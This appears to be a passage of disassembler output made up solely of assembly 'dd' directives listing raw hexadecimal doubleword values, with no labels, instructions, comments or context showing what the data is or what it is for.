		dd 9060816Ah, 9BBC355Ah, 21C2FF71h, 31C2304Ah, 0E1F8EBD1h
		dd 221F907Ah, 97A83FD0h, 21EB443Ah, 82C2B622h, 0E7DC81F1h
		dd 0BC6A833Bh, 5F55B8B8h, 3C58BC9h, 0EBBDB5FBh,	94BCE01h
		dd 0B3CD4498h, 42AEF9DAh, 475807E3h, 0E0EFCF29h, 62035C8Eh
		dd 0B43EF6C5h, 20741777h, 5C35DE69h, 357C3A65h,	2355EB54h
		dd 77356058h, 0E49B4532h, 58D3576Bh, 8C5F05C1h,	1F81B349h
		dd 348F301Ah, 3A91FF2Ch, 25B1B19Bh, 462C8684h, 742B347Bh
		dd 0D9CB2EC3h, 0BFF5770Eh, 2AE404ADh, 5F25EBC7h, 47DC750Dh
		dd 8E1D9457h, 4B1328AEh, 6203832Ah, 1EE31DF2h, 89C3F2EBh
		dd 3089C140h, 4545A847h, 81482BA0h, 12624527h, 25EB5AEBh
		dd 0E7F1350Dh, 0A0B1ED82h, 30EE0C5Ah, 8AE84082h, 6DD47AF8h
		dd 5493D7B5h, 0EE2674E7h, 0AD70D218h, 562B4EB0h, 448F81A8h
		dd 0E38C2C3h, 5B70E481h, 8F33A94Bh, 0CB6A0A7Ah,	39DC9728h
		dd 0E4BC051h, 0D8646814h, 9EFC3FFDh, 0E5EB3D30h, 0F4450626h
		dd 892A59D8h, 0FC27FBCh, 86D0DB4Dh, 8DA14A47h, 0CFF4E2EDh
		dd 0FA54C72Ah, 6EAAAB4Ch, 0C0BD27F2h, 99A89EC4h, 0C072986Bh
		dd 0BEE7795Fh, 7A58E02Fh, 0BF1500CEh, 0BB38DBAFh, 8BED0E36h
		dd 0F0101C24h, 371EA8DFh, 0BCA03C3Ah, 11DB7323h, 60D111E4h
		dd 1BB15F26h, 0D59E8783h, 2A8CD828h, 4A03B956h,	186ECA3h
		dd 1DE527Ch, 3387D6Ah, 82B30C56h, 9CC00EB0h, 0B689B8E8h
		dd 470D68EAh, 4F97EA5Ch, 521A92C0h, 660F5970h, 3417FF84h
		dd 2DCB8CB8h, 0C44E8208h, 1A14D37Bh, 0BC4663CAh, 8DAA355Ch
		dd 3F0CF34Ah, 81430D89h, 21AD1E08h, 731A1A41h, 930259B1h
		dd 54AB0953h, 0E930B402h, 0B505AFCCh, 0E0298EEAh, 0EC1270D6h
		dd 0E0DD9038h, 0E37E813Bh, 0E185BEC2h, 5F54FFB5h, 0E7FC9A2Ah
		dd 82538F6h, 0BBB3DC29h, 820A40A4h, 94A98943h, 72C4B8A6h
		dd 797CC215h, 1ED9B996h, 0AA55BDA2h, 643F4E66h,	8A632070h
		dd 6DC3C82Bh, 2D1AAB53h, 9D4AB545h, 0C2D90550h,	0F1DC6F80h
		dd 0F436B8A4h, 51795D43h, 10374ED0h, 1A05CD2Eh,	0BA8FF0F2h
		dd 75EA108Ah, 7E6BA920h, 0C2BD96CEh, 28C038BEh,	0C42E4C61h
		dd 70C4ABB9h, 0F4B85E57h, 0AE10FDFCh, 7DAC391Bh, 3CFB41CFh
		dd 0F020ABB3h, 0CFFD9A77h, 0B732AEBDh, 887ADAD0h, 433B8EF3h
		dd 5EB47AB7h, 4F56CE9Dh, 0FD762C5Eh, 1020DABFh,	246EF42Eh
		dd 0F501DCF5h, 0EA4E0AE2h, 0D266034Eh, 0DC1021E8h, 0CFE8FE8h
		dd 867F1042h, 0F80F11A1h, 0E20B894Ch, 28B6D157h, 60287D88h
		dd 0B2195328h, 6D747E18h, 0E6713FFFh, 8F921EB2h, 4AFB133Ah
		dd 53237B01h, 412C0DC5h, 302811CCh, 48328508h, 22881EBFh
		dd 1878DA90h, 0CC5F3B1h, 0CDFFBE07h, 1ADD0D13h,	91C871D9h
		dd 4741689Bh, 8EBBD73Fh, 5CF149BDh, 8391924Bh, 92AE3EB9h
		dd 0D641EA1Ch, 0B1B19E25h, 5D0D81FDh, 4E12534Ch, 86319C57h
		dd 58F4CABFh, 0ABCC578Ah, 416AF7E8h, 2DCA83E0h,	0E3C1FE82h
		dd 8B195159h, 5EFC511Dh
		dd 70DB5982h, 0F6CE2205h, 73F6C042h, 0E29EF8B5h, 8050F9ECh
		dd 9062D36h, 9945D824h,	71BEBD3h, 0BA51D6B4h, 0C2BB84C8h
		dd 0D10D36ACh, 0BECD6DE2h, 68C4ECE1h, 3400C61Bh, 98C32FD8h
		dd 5072D360h, 28891CD7h, 0E388F013h, 0FCFA5000h, 108094B7h
		dd 4B7F82F8h, 57C789CCh, 0E830804Ah, 0A7016134h, 0C63B7709h
		dd 39C145Fh, 7B787DD4h,	2CD15C1Eh, 0A592A736h, 0AEF86A1h
		dd 0ACDDEB0Fh, 541B57CCh, 0A81A9D2Bh, 0FF191B7Eh, 4CC4C0DFh
		dd 7F618A28h, 0AA142F0h, 0F1776929h, 3C11CB7Fh,	0C1F1890Ah
		dd 0B3DC85DEh, 0AC5CE214h, 103A9544h, 5E1D4B45h, 50DBAEB3h
		dd 0B20752D8h, 6DC2156Eh, 4D0C5003h, 1D5769B4h,	7037A38Dh
		dd 4ABE8C57h, 3160B4C8h, 0C4246620h, 0B184EF6Fh, 10A62969h
		dd 1D91387h, 0A26DD7Bh,	0D0CCD44Ah, 8A9FC0A2h, 0A3C6F814h
		dd 89EF05FDh, 3E398AB1h, 7749CD12h, 0CCDA5853h,	4EFEB84Ch
		dd 15775098h, 2EB2E625h, 2B27D0E1h, 602E069Eh, 0E7C4A375h
		dd 4C5AD360h, 29734EABh, 0D5A50A2Ah, 6F48F03Fh,	0B2E07974h
		dd 4CA65A0h, 2C1D8EDFh,	0E30B3212h, 8B82F928h, 0C4739703h
		dd 0B628CE90h, 0A7741B46h, 6992182Fh, 0A5DB09B7h, 0E085F9B3h
		dd 22A3B5EBh, 7D827B8Ah, 529C29C3h, 78C20C60h, 0FD212F80h
		dd 115EB35h, 28BDD0E2h,	405C55AFh, 6584187h, 1F827D0h
		dd 0A376462Fh, 0A7CA5E2Eh, 39958DA3h, 568D7809h, 0D3995D23h
		dd 4FF62791h, 8103D18h,	0B383E62Ch, 0A4E7A5F6h,	0FCB911F5h
		dd 0BCD5EAB9h, 77BF1A1Dh, 0C447966Ch, 0BC0D88EDh, 71573048h
		dd 93A817C1h, 0E6F64FF1h, 4A3AE01h, 80B98C82h, 0B48A12AFh
		dd 0D7865966h, 4592DE01h, 2B0AD06Bh, 1A0D9831h,	38C6C60Eh
		dd 0C8454674h, 483020A1h, 0B2E94B06h, 0A96B07DAh, 46AB7EC4h
		dd 4C947811h, 0F46A795Ch, 9A0EA338h, 0A989E702h, 1AFA8FE3h
		dd 5598BF45h, 0A3FC9228h, 40E9B8EFh, 0CA274B75h, 32BDE270h
		dd 0FF1A369h, 0B8717102h, 96F520ACh, 29708D3Eh,	0B7D30C07h
		dd 0B454149Dh, 994E1346h, 45C917ABh, 76C08D15h,	77204EB1h
		dd 0EEC5B42Ah, 67FB18FFh, 0C7411674h, 9FEEBDCBh, 0BFDA6217h
		dd 0FC37A4ABh, 9FE04D8Bh, 4250526Fh, 0FB17928Dh, 0A73EC366h
		dd 3E69CC34h, 60CBA2FAh, 0AE9322EAh, 17A46384h,	0A79BAAB3h
		dd 3EB3B142h, 24AF728Ch, 5EE03B5Eh, 0E9D07711h,	9837BCE0h
		dd 0F19E4358h, 0C3B3AE12h, 5AFB4CFEh, 57F67017h, 7C7B8550h
		dd 5162466Dh, 0A08C65B2h, 391EB8FDh, 15AFA955h,	692287E1h
		dd 0C25A2394h, 0C4DAF885h, 4F130712h, 6D48689Bh, 93D56A22h
		dd 84594DABh, 4BF52791h, 0D2357053h, 4C70A1CCh,	5D315776h
		dd 2F58E265h, 0B81445F7h, 84BF071Eh, 0C6465740h, 5D355B03h
		dd 0E44214D7h, 0E07D6676h, 86603AE7h, 6EA2CF44h, 0C8C8E7E4h
		dd 0AB2B2EE7h, 0A558BD8Ch, 328366A8h, 0BF01AFDBh, 3AAE12B7h
		dd 0CA609431h, 7584B32Bh, 15770341h, 40A2AD5Dh,	0CE77AAC5h
		dd 0FA046A66h, 9D6B7998h, 0B01A2B5Ch, 724C41EAh, 91EE6A74h
		dd 1E944B8Ah, 0D446E02Bh, 60E73069h, 0E4A19623h, 46B7A114h
		dd 8B02784Bh, 10D4FD74h, 258884A1h, 0A5243409h,	228CAF1h
		dd 0B80DD0E0h, 0A1CD1A8Dh, 0AB9A71E0h, 8C1EB6ABh, 0B38522C1h
		dd 8E56E3Fh, 624EA1F7h,	41CF2F4Eh, 376A3D35h, 0A0EC0811h
		dd 9164D60Dh, 799802C4h, 0B0871CBBh, 0A18484D1h, 892C0A1Ch
		dd 0BAC33260h, 65FA4515h, 9565CE54h, 6B2680A6h,	8B39B45Dh
		dd 76248B2h, 521678CDh,	9A2612BAh, 1F17C55Ch, 0EA3A46Dh
		dd 0CADD659Ah, 0BAA5473Fh, 0A68218A9h, 0FB13658Dh, 6956E73Bh
		dd 0DF7A5FCCh, 3A0A6D49h, 7357E754h, 37E0475h, 3B15C262h
		dd 99538A3Eh, 40C12FFFh, 0BA03EF8h, 0A67087D7h,	0C42476A1h
		dd 307E3C87h, 0EA9B8256h, 62640808h, 0AEE8044Eh, 0FC24617Fh
		dd 6F82FE01h, 14A51F83h, 2A51370Ch, 8E248070h, 37D26449h
		dd 0B4AD6C38h, 0F6928485h, 8D9E120Fh, 0FA53AAA8h, 1545FDFAh
		dd 4310A44Bh, 52BB5DE2h, 17FFB2D0h, 0FAE2FDE3h,	392A11ACh
		dd 9F24AE84h, 887F0A59h, 4524173Fh, 0D4F848D0h,	0ABF85E2Fh
		dd 0EA552636h, 3F85B540h, 0B83516C9h, 0F7365B44h, 0FE7F8A5Ah
		dd 2C125A62h, 0AB5245h,	19A7DEB5h, 86BFCB94h, 9BF9CA29h
		dd 92CA0062h, 5A955C3h,	858570DFh, 0A127FA9Ah, 2D4B07F0h
		dd 0C373A456h, 0EBCAABEh, 52E1AF01h, 0A8ED0344h, 2328AFD5h
		dd 0A687935Fh, 79B91F07h, 28952765h, 25B70706h,	5E7B0427h
		dd 0DDE1CF88h, 6D605088h, 0B32896A8h, 2D102101h, 50EA9198h
		dd 911B7C6Dh, 0F82ACCEFh, 0F1AE048h, 641BEE12h,	0A384A2D1h
		dd 0B9FC71F8h, 3CB82B09h, 2AAF4C86h, 1C4897DDh,	0ABD63FD5h
		dd 0EE55ED1Dh, 615E5DF8h, 159FEC1Ah, 0A9AF55E1h, 2F936B04h
		dd 0E3189284h, 0E6DE742Ch, 0AD6DEB82h, 0DA4983B3h, 9A15A418h
		dd 7BA1C54h, 0A93CE42Bh, 6B1B49CBh, 75E748DFh, 8AF88E52h
		dd 225EB941h, 80A7EEF0h, 18BF62E7h, 0B558697h, 9FF382EBh
		dd 40B26843h, 576F9672h, 0CA05E909h, 0E2F81895h, 0DB72F7ECh
		dd 0EB7F35B7h, 4EC1574Bh, 0B04A3850h, 5D47CF3Eh, 4D9143E9h
		dd 4CE2B1A6h, 87B8029Ch, 591D1A0h, 0BE1D324Ch, 9A19FC5Fh
		dd 9C92352Eh, 4B3646C1h, 0A70E5F3Ah, 0B76AD5F6h, 0F16A1B0Ah
		dd 6C5E83D7h, 0C095523Bh, 3E79D8B7h, 0E0D5573Dh, 2EEB7889h
		dd 4DE9518Ch, 0C412D7C7h, 1698065Fh, 0A48B2AAh,	3B811392h
		dd 5778465Fh, 8555575Fh, 0E4E99684h, 7995D57Ah,	754BB106h
		dd 7FE6FA34h, 0AE7D1484h, 85AE9C50h, 0D2892701h, 0B5B5AF41h
		dd 2EA75272h, 57627DF2h, 9FF5611Dh, 0B1B3895Dh,	69CC943Bh
		dd 9FCE46ADh, 0DD6A795Dh, 6C673FAEh, 25488C3Fh,	1369E1DDh
		dd 0DAA17ABBh, 8595EBA8h, 605D4EB8h, 4B5DFE0h, 56AC658Ah
		dd 545C5D40h, 0AE81BE93h, 1E45EBE6h, 0D3E2B415h, 6AD79E42h
		dd 0BE24AA8Fh, 572CFD6Ah, 8E6CAD0Ah, 0E2BED677h, 0E48A6B6Ch
		dd 6AED8EC3h, 2D515FBEh, 3B26A342h, 591217D3h, 16A8CDE6h
		dd 1547746h, 0A83B920Ch, 455652B8h, 0F7149D21h,	6015C44Ch
		dd 0AA7C2F54h, 50FA521Bh, 0E22EA497h, 0E40A06EFh, 6C633AD9h
		dd 0B913BCB0h, 5585F105h, 60055306h, 72B7481Dh,	8C3F00A2h
		dd 0D0AB6870h, 0E611286Ah, 4F4D8A92h, 6CBB5C56h, 8C9E1A8Ah
		dd 0AA347ECDh, 8B5D757Ch, 80286AF9h, 0B0196496h, 48AA5165h
		dd 0F580C6AFh, 7250BF48h, 46E03670h, 7682325Fh,	6CCC6078h
		dd 6568AAAh, 94074091h,	23410888h, 440186FAh, 0A805718Ch
		dd 0D2CFE2h, 986C68E1h,	78F01C18h, 0CB41008h, 48315860h
		dd 82D07C44h, 0AF9370D0h, 0F2158735h, 0FEC91481h, 866C991h
		dd 44232575h, 1F1C07F4h, 0EF826E4Bh, 0D55208A4h, 653663D4h
		dd 825DAF2Fh, 10AF1052h, 792E5D11h, 0FCE0FA57h,	0E739B2A9h
		dd 4C11FBE1h, 0EC64F69Eh, 0BD87D501h, 18B80688h, 7681537Eh
		dd 0F90F7525h, 0C1960093h, 8E4CC2F4h, 3C4DA78Dh, 5AAD7171h
		dd 8FC157E8h, 0FB70FC01h, 7F057024h, 7F581E1h, 60CA8BA7h
		dd 0D03B04A5h, 0D62ECFEEh, 7652515Ah, 0A1029676h, 58A21175h
		dd 0E3380481h, 4FD7C05Ch, 40A0BE57h, 121A8DA6h,	89FE9F73h
		dd 646DE6E2h, 8CFA84DDh, 0DA57031Ch, 9B39E398h,	0E208186h
		dd 2256B855h, 0E52D7583h, 72B6608Eh, 0F903536Ah, 0C4D60483h
		dd 1B0A29F4h, 4A10975Eh, 0D2900CDh, 0B3B2AE6Eh,	0C1CF1AE8h
		dd 0DF46D5DFh, 0E2431B46h
		dd 404AB31h, 0EE082B58h, 6109E0Fh, 7A770D8Bh, 40B1CA5Dh
		dd 83F0DEBBh, 0EFAC6544h, 9260C6C4h, 0E95E20A0h, 60B8D76Ah
		dd 51021841h, 0DC83B5A0h, 17C5B83Fh, 7EEF7C8Dh,	4374F2FAh
		dd 9903BF5Ah, 4D346B0Ah, 7D71825Dh, 2FC0AA4Ch, 46AEAC6Dh
		dd 83220C7Bh, 8DB5C06Eh, 34FA0800h, 0A5818149h,	4894F0h
		dd 764E8421h, 55D01FC7h, 65E32BA6h, 0C22AD65Dh,	447CB50Fh
		dd 0CE89C150h, 112231B0h, 180B7ACCh, 327595E0h,	245D9340h
		dd 0A50529D8h, 361F6C18h, 0A88D6C45h, 1B9CFEE0h, 7D3E1903h
		dd 0E5129701h, 19432010h, 6131C515h, 51796075h,	50429033h
		dd 2521A88Dh, 515E6306h, 19002F10h, 237A626Eh, 1AE141DDh
		dd 0A2308DE1h, 627A12Fh, 3E92A611h, 0FEAB4498h,	0CC1647C3h
		dd 36A28DC7h, 0D86A742Bh, 0C416B17Dh, 0CD6B1486h, 1CFF4F8Bh
		dd 78260EB1h, 3A446A84h, 1AFAA1F0h, 7FFD3058h, 33DA9D4h
		dd 4D426620h, 0F8BA9728h, 874C1007h, 10360441h,	593F1E93h
		dd 1B05C458h, 602FD48Ah, 0EE9864Eh, 3FC02B72h, 0F0FA4E41h
		dd 5A9B966Ah, 0C2185D16h, 9E058165h, 0DCCB2D80h, 5C071105h
		dd 43F1D96Eh, 0A95F25B9h, 0D22355BBh, 96A42163h, 7BCDECA8h
		dd 2EF94517h, 60573328h, 0A1657E08h, 60EDCEE0h,	0A3837682h
		dd 204B088h, 62C488E2h,	8D2B4990h, 0F727CF5Ah, 712A75FAh
		dd 35987A1h, 6F857478h,	83E0D70Ah, 4AC1D669h, 0E27441Fh
		dd 52A0F928h, 718E7CF6h, 5E3092FAh, 331BB88Fh, 25AF6E40h
		dd 81860E5Ah, 8813ED14h, 50871DA3h, 0D8C846Dh, 0CDD035DEh
		dd 8A24D18h, 40B3B5AAh,	0AC455920h, 354392D0h, 27F86A8Ch
		dd 0B7762EB1h, 0DE0E14ABh, 18999EBCh, 4E179C21h, 762CF3B8h
		dd 6088828Ch, 0F0F74030h, 868BBAE0h, 5C436339h,	0DB59A811h
		dd 0C0A19267h, 91F98825h, 0ED25AAB5h, 4C24C5F0h, 6FE2DCC4h
		dd 0AD15C111h, 318BF8h,	295A042h, 3419756Ah, 0BD8E75FAh
		dd 3A9A8BFDh, 18719C1Fh, 0F9FA05E6h, 0CF7611A2h, 0C6E50A5Fh
		dd 19237D4h, 0C4D5C8DCh, 7A1A77FAh, 0AF9F7F97h,	0C428CC44h
		dd 0D507C1F4h, 0FC7FD12Ah, 3D8A0748h, 3721CAE2h, 0DC4CDF16h
		dd 7DEEFC01h, 402F4008h, 0EA84F501h, 3D1F003h, 8C4010DEh
		dd 468AEF10h, 0E5E21AC1h, 0D4169375h, 8516C451h, 0C7D0FAAh
		dd 8D74369Fh, 1299A82h,	5CB21AA5h, 8AA2741Ah, 0CAD67A8h
		dd 0A8D4EA6Fh, 8FF73762h, 0C052329Ch, 538E0709h, 709BA6C4h
		dd 6616DD60h, 0F57DC411h, 15997244h, 8747FA52h,	218F45FCh
		dd 0EB075173h, 79006532h, 95D4C59Fh, 22FC29D7h,	1CA45ECEh
		dd 8BA71F52h, 7E6FFBE9h, 77F1FF30h, 272D8526h, 0C122C6DFh
		dd 7E432247h, 507920ADh, 0D7C5F1D5h, 4B0FB70h, 0AB43328Ah
		dd 0A0523ECBh, 0C1FC98F2h, 3832F3B9h, 0A4FCC129h, 0CA25B3F0h
		dd 21C55DA0h, 93B21590h, 0AD0CD7E0h, 0DCC8908Bh, 97E3161Eh
		dd 80BDD38Ch, 4491B4Ch,	7F07BA99h, 30EA3264h, 83DCC1F0h
		dd 0CB8999CCh, 9801E53h, 0A051CE24h, 0C69132FEh, 0E8087903h
		dd 0A2BC257Ch, 95C8EE2Ah, 1E4BD2E6h, 0F825580Ah, 567E383Fh
		dd 13EF3F06h, 0F43E2413h, 9FB475D5h, 83A08763h,	200C220Ah
		dd 2CD38101h, 73400805h, 3CBC9D1h, 154C333Bh, 8444AD5Fh
		dd 0A47583BCh, 7D1D2FFh, 0A63608E2h, 802439E9h,	39A88D6h
		dd 3DE31D90h, 8D6A9965h, 0E7279F30h, 2166C0BAh,	72644415h
		dd 3A0DA303h, 7B705712h, 6D18B417h, 1022048Ch, 0E163D1DAh
		dd 0B07502A7h, 0C6CEDB11h, 97A8B1D0h, 0D8641F8Dh, 69C19095h
		dd 0DCAA45Ah, 0AA95114Bh, 0FD04E4CCh, 0CAA85707h, 4028A760h
		dd 57BEB003h, 0A8A4B69Ah, 3297CAA3h, 3F0308A8h,	0B4EC536Ch
		dd 6DFE3A83h, 0C95DA2B2h, 382945B9h, 4D5A20CAh,	6510E56h
		dd 6B149C8Dh, 0BAA3B5D8h, 342B704Bh, 93454A17h,	0E2B82A8Dh
		dd 0ACB11035h, 867CBB38h, 544B418Dh, 0B5184BDEh, 44954297h
		dd 457A18D1h, 3385B5B1h, 0A2BB0CA9h, 0E76F123Ah, 0E8931F44h
		dd 7224D1BDh, 0A686946Eh, 0CA8A3D11h, 91E51DEBh, 206AEB53h
		dd 8FE35C71h, 2DBF2091h, 0B9FB1CAh, 8AACD14Dh, 5E5C681Ah
		dd 22E57341h, 5C99655h,	0C2A63C3Fh, 20ABB169h, 0B0B3B4E9h
		dd 0FF4F55EFh, 770D1CEFh, 3567DC59h, 28CC8F5Ch,	2A0B58A7h
		dd 35EFCFECh, 0BAB69434h, 6C7224ECh, 4827953h, 5F5E7723h
		dd 0C1F09FE8h, 0BB0FEB0Ah, 0CBD1E287h, 584CD025h, 0F8137FBAh
		dd 0A9D92AE5h, 0DD2C2C48h, 5C3346ADh, 3844581Fh, 443D077Bh
		dd 1016C1h, 63AA2E5Fh, 8CC63F31h, 183E12C3h, 61244038h
		dd 0A409FD5Fh, 0EB096EE0h, 0B54C27E0h, 759531FCh, 0ED2016BAh
		dd 65B01306h, 0FDD325A8h, 3AD4738Fh, 501CA6Eh, 0FF79AC07h
		dd 450D03F5h, 2063C0BAh, 1149E314h, 0A41317C5h,	94AB1D35h
		dd 0BF89F75h, 8B649A08h, 1487DA42h, 72ACE5AAh, 1757FD5h
		dd 27AFC8E1h, 54E7BE88h, 3048CEF3h, 0F91FC2B5h,	0B319267Fh
		dd 5B5439F4h, 0A8686415h, 0F85282BEh, 6D517268h, 0AC2A8904h
		dd 0E47C44F0h, 0E09056BDh, 33A569Dh, 847FBF2Dh,	94B0E6C1h
		dd 0AE3AFD2h, 0D1290051h, 62F989C2h, 0DFCC7D93h, 70B3EE13h
		dd 0C7B26DF2h, 0C45194DCh, 8FFA475Ch, 99830C00h, 73CC1F75h
		dd 0FD7207B1h, 62790C2h, 86BDC70Fh, 90C63198h, 326E60BBh
		dd 950A4250h, 0CB82B0B0h, 7E06D90Ah, 2F4BF11Eh,	12838412h
		dd 8F0B388Bh, 63578A04h, 698ECD00h, 10B58C51h, 183AA520h
		dd 5E5A1440h, 68B5D31Dh, 81F461A1h, 0F2CEF646h,	0F84C0A2Ch
		dd 373F1A1Eh, 8D52ED6Ah, 0C11B87EFh, 7D682F17h,	0D1BA0D5Ah
		dd 310B4DEDh, 0F91BC6EFh, 9BBD4FE6h, 0F259DD09h, 0C2898E3Ah
		dd 2E790BC4h, 52EBD322h, 0D173C078h, 0D993F031h, 88645A04h
		dd 31B79AA2h, 9F1C3822h, 0E3AB9040h, 8DF08D4Eh,	5E0A8C52h
		dd 476C981Ch, 9C4C4580h, 6A08AC04h, 5A08231Ah, 455B71Ah
		dd 3168DB28h, 5B0072AFh, 94AF2C28h, 0F4AE431Ah,	340EC0AFh
		dd 5F464C5Fh, 1E42A16h,	0F1A62FEFh, 8EFD8183h, 0E5B22B69h
		dd 59D5302Ah, 711086D1h, 3240B01Ch, 0FB07F60h, 156AEB73h
		dd 33BE6135h, 61C4B9B8h, 0E380639Ch, 2DD8991h, 885DA462h
		dd 8F64697Bh, 338621AEh, 0DA6D0F9Fh, 5D6C4E15h,	382A8F1Ah
		dd 6A024184h, 9858251Fh, 95AEEF03h, 0FEABFBDAh,	30C61983h
		dd 0C715F7E5h, 0A81D50Ah, 0AD4F766Dh, 0AF638480h, 41F0F974h
		dd 28A04F5Bh, 2F10F61Ah, 7536D5Ch, 0B19E3703h, 0EB2FB748h
		dd 0EFB88Ch, 85AF385Eh,	458A406Fh, 63D0F4C1h, 6A34343Ch
		dd 0D0AB78EDh, 43ABD175h, 70C64BB3h, 19AF9187h,	5EBE5F4Bh
		dd 0D28C508Ah, 0C7733344h, 2EB20CE6h, 0F679B6F8h, 7F2EAC1Ch
		dd 4011EC5Eh, 0CA22921Bh, 0B7B506AFh, 1425168Eh, 0D4B107Eh
		dd 66016A8h, 6CCFF15h, 93525084h, 0A736B1A5h, 0D2262AA6h
		dd 0FCEA8865h, 3175541h, 256293E4h, 44310D10h, 2AC8989Ah
		dd 0C567A735h, 0E90ED3A4h, 0EF7C3AFh, 0F555C86h, 1190C2Fh
		dd 0EE95C850h, 0D62E4AE5h, 33544ECCh, 3F3F8136h, 56CABD85h
		dd 0CB144BFCh, 9D7B680Dh, 8C72D460h, 842F7855h,	0E8E612E6h
		dd 0B5149205h, 357FC77Ch, 0F5F80BA4h, 34D42ADCh, 570AD553h
		dd 579F4054h, 0AE1AC68h, 8460C8A3h, 0EC4C054Eh,	3813FC1Fh
		dd 0F78739D1h, 0CDA9502Ch, 800D840Ah, 73A47541h, 6A690245h
		dd 0F659BAB7h, 5D21A86Ah, 50103BF8h, 55F88C19h,	4515BAC3h
		dd 0DCCED5BFh, 0B34E4AD9h
		dd 4220439Bh, 0CADCA863h, 293E3577h, 4C2520Ch, 1189C6D2h
		dd 933B1C33h, 72175FE2h, 5EA0FDBEh, 0E555E8EDh,	0B14FC747h
		dd 9A3AC401h, 0C16BE7AEh, 0E5721201h, 0F93368E5h, 0AFE1E033h
		dd 0F9C1748Dh, 0C67EF4A7h, 0B0387D61h, 0F58D7DA0h, 26522655h
		dd 0BA45A7D6h, 2A990920h, 96FC2D50h, 0F84A2A88h, 0EB5C8C8h
		dd 1D9CEE58h, 0A6204125h, 2CE85534h, 0D7DE9FAEh, 0BDC93C55h
		dd 66F2B419h, 377ACDF5h, 85E212A1h, 95FAE10Eh, 91F6EC8Ah
		dd 0F339DBB6h, 0EA41A0BBh, 0FF49067Fh, 21786573h, 2204825Eh
		dd 0AA96B88Eh, 0B6F86A02h, 6A3E9430h, 342EB3E1h, 1B86A30Ch
		dd 0AB968C24h, 87AE5CA2h, 0A2E514Fh, 0FCB826BDh, 0BEB8CF87h
		dd 7121D563h, 72FF39F1h, 194F57EDh, 572AE757h, 4FB3B51Ch
		dd 60EF6132h, 7597749Ah, 28C6E2E9h, 72DC2C47h, 0FF4C41BDh
		dd 0FD9F540Fh, 0A1860285h, 26A560D4h, 9C4ACDD6h, 0A39F831Bh
		dd 0B2709764h, 517FB09Fh, 95D3EAA5h, 1FE4E9D7h,	91E05A1h
		dd 0B9174BC4h, 0B533FA38h, 4C592209h, 58F19D5h,	300AD70Eh
		dd 58408DECh, 69B97FFBh, 3A050CE3h, 0B9F0C6FAh,	0FA362FAFh
		dd 6D456D1Dh, 49C4DFC1h, 821BFC00h, 131000CDh, 9CB5C55Dh
		dd 5C8BCF40h, 0BEED583h, 964D2698h, 0CBD9A17Ch,	81E72222h
		dd 61F798F9h, 22F94148h, 0FEFB8E8Dh, 0D7470B9Ah, 3A0CAB49h
		dd 42505C0Dh, 0BEE1D16h, 44668A01h, 73E57E53h, 288D201Fh
		dd 0F212A0CAh, 755D5E3Eh, 4566C289h, 30089366h,	9DF753FFh
		dd 23404892h, 89CC8CE1h, 0BA4D438Ah, 33F926h, 0B311F273h
		dd 8307B086h, 0EF3655F3h, 1CC5BE0Eh, 0DC1F8A59h, 40E7D1C4h
		dd 9648C678h, 8BBC15C2h, 90D22795h, 3F1454Fh, 0F4F0C026h
		dd 9820E473h, 0B3291A15h, 7063082Bh, 4CB5BEC2h,	4821E50h
		dd 6BBC41DAh, 21F85667h, 6CFF8A63h, 53577BD8h, 562AE498h
		dd 2D989A00h, 1B80E058h, 7A3D8518h, 377EA34Bh, 22823BB8h
		dd 0A4F6B211h, 0B2C2AFC0h, 0D4880A02h, 0A95BD6B2h, 0E27F16Bh
		dd 1790A448h, 83654534h, 0AC437D0Eh, 7358E617h,	0F1AC0492h
		dd 141BD4C8h, 46D49A18h, 982B90C9h, 5A947D4Dh, 0A58A426Fh
		dd 0BB02301Fh, 0D8BBC903h, 5D060A6Eh, 31BFFFF1h, 6F9B269Dh
		dd 39A11830h, 5871AE62h, 143D76A5h, 6D124172h, 38781CACh
		dd 0B4A110B0h, 310AE02Bh, 0DE04E002h, 0C6BF8EA6h, 1A4D35E8h
		dd 2937EC7Fh, 0A5A18DDh, 10B64A30h, 0D05A0B4Eh,	31792BE2h
		dd 3766EEA3h, 484E8335h, 5885A82Ch, 0F455ED97h,	0A6BB0C12h
		dd 4EBD3516h, 898D520Dh, 62D4DC9Ah, 73C9514Dh, 2F806BA0h
		dd 9A17B5D6h, 0C2FC3901h, 48A88D0h, 60DF944Bh, 0B2A14F26h
		dd 67113246h, 9724FE89h, 4CDA6B22h, 0FD051873h,	87D94083h
		dd 87B94ADEh, 879912EAh, 877912F0h, 318A12B0h, 8A6726F2h
		dd 0AB7BFB6Fh, 7EBE9C22h, 0AA2FB7BFh, 42333B98h, 0F4319D65h
		dd 638E8BA6h, 0D608B75Eh, 0A9C208AFh, 78753221h, 4FC04986h
		dd 0EE4BD4C0h, 9EB0F263h, 0CA9AA840h, 285D1903h, 63941AB2h
		dd 7BF22B4Ah, 0A08390h,	10509A05h, 0C1100842h, 438F48A7h
		dd 52957E2h, 0E6F545C4h, 3E66159Ah, 5DF6BC17h, 0B186831Bh
		dd 0A2896E1Ch, 0C0E373B8h, 9A789851h, 2A33ABF3h, 4D9B20C1h
		dd 0D175395Ch, 0F70AEE7Bh, 8C7FB9E6h, 8D01E31h,	299AAED8h
		dd 3C0A7439h, 0D60A0696h, 32978505h, 5F70FBCDh,	4298B03Fh
		dd 8FA3F9BEh, 481A68AEh, 0FE04C9Bh, 0A4A40A66h,	6006E128h
		dd 0F202EACBh, 0B7350C06h, 0C1689997h, 3354939h, 95F0E7CDh
		dd 0C8244D5Dh, 99E04302h, 6CEAD62h, 9749E165h, 6F47463Ah
		dd 0A34B3C3Fh, 782BFE2Eh, 34152EBDh, 0BFA7B96Ch, 8B0AFCF8h
		dd 13D7BD74h, 4C6A6C1h,	155E0DC5h, 0AC742020h, 378B0082h
		dd 0ECEF46ABh, 0F5748389h, 0A2358CB2h, 8176972Fh, 7396CE14h
		dd 63B8DFC3h, 99955766h, 3F867E23h, 30A4F0BAh, 7A199C7Bh
		dd 0E0E1E404h, 0F590235Dh, 0B0B859BDh, 51ED5351h, 0D6532186h
		dd 5C08AE88h, 0E6B158CFh, 76A309ACh, 6E8ADA05h,	0B8B48D5Ah
		dd 160F9425h, 0F0717C05h, 0C76230BCh, 0A9C2FB0Dh, 0E949895Ch
		dd 0B2DE0606h, 3175101h, 0D1800F5Dh, 7C5D375Bh,	0AC0CF7F7h
		dd 0D0882FEEh, 42D32BECh, 0FCBF4C79h, 42039861h, 0CB4620A0h
		dd 2FA18DC5h, 4292DA05h, 887F2DAFh, 8FC477B4h, 0D5B92235h
		dd 7820D0C1h, 2470275h,	0BAC39E42h, 0AB392DA6h,	99D0B01Fh
